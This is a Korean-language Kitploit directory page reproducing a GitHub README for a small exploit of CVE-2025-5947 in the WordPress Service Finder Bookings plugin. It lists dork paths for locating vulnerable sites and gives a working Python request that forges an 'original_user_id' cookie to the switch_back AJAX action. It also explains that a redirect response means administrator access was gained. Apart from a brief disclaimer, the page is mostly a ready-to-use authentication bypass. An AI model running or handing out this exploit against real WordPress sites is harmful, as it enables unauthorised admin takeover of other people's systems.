Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-5947_Exploit — An mini exploit for the Service Finder -Bookings plugin WP | Kitploit
도구/GitHubGitHub/m4rgs/cve-2025-5947_exploit
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubm4rgs/cve-2025-5947_exploit

CVE-2025-5947_Exploit

An mini exploit for the Service Finder -Bookings plugin WP

저장소 보기
110개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🔍 WordPress 플러그인 익스플로잇 — Service Finder (sf-booking)

개요

Service Finder 플러그인은 WordPress용 예약 및 서비스 관리 시스템입니다.
인기와 복잡성 때문에 일부 버전에서는 인증되지 않은 AJAX 엔드포인트 또는 부적절한 접근 제어와 관련된 보안 문제가 있었습니다.

이 README는 연구자들이 설치를 안전하게 식별하고 윤리적 관행(dbr krk)을 따르는 방법을 설명합니다.


취약한 WP dorks

/wp-content/plugins/service-finder/

/wp-content/plugins/service-finder-bookings/

/wp-content/plugins/sf-booking/


익스플로잇 워크플로우

⚠️ 면책 조항:
이러한 검색은 교육 및 연구 목적으로만 사용하십시오. 무단 접근이나 익스플로잇을 시도하지 마십시오.

root@kitploit:~
import requests

url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
    'original_user_id': '1',
}

r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
  • 300-399: ✅ 취약! 관리자 패널로 리디렉션 — 관리자(ADMIN) 권한 획득
  • 400-499: ⚠️ 클라이언트 오류 — 요청이 잘못되었거나 권한이 없음, 취약하지 않음

참고 자료

  • WPScan 플러그인 데이터베이스 — https://wpscan.com/plugins/
  • 국가 취약점 데이터베이스 (NVD) — https://nvd.nist.gov/
  • OWASP — Google Dorking / 정찰 기법
  • HackerOne 공개 지침 — https://www.hackerone.com/disclosure-guidelines

작성자

Taha Mounir


도구 다운로드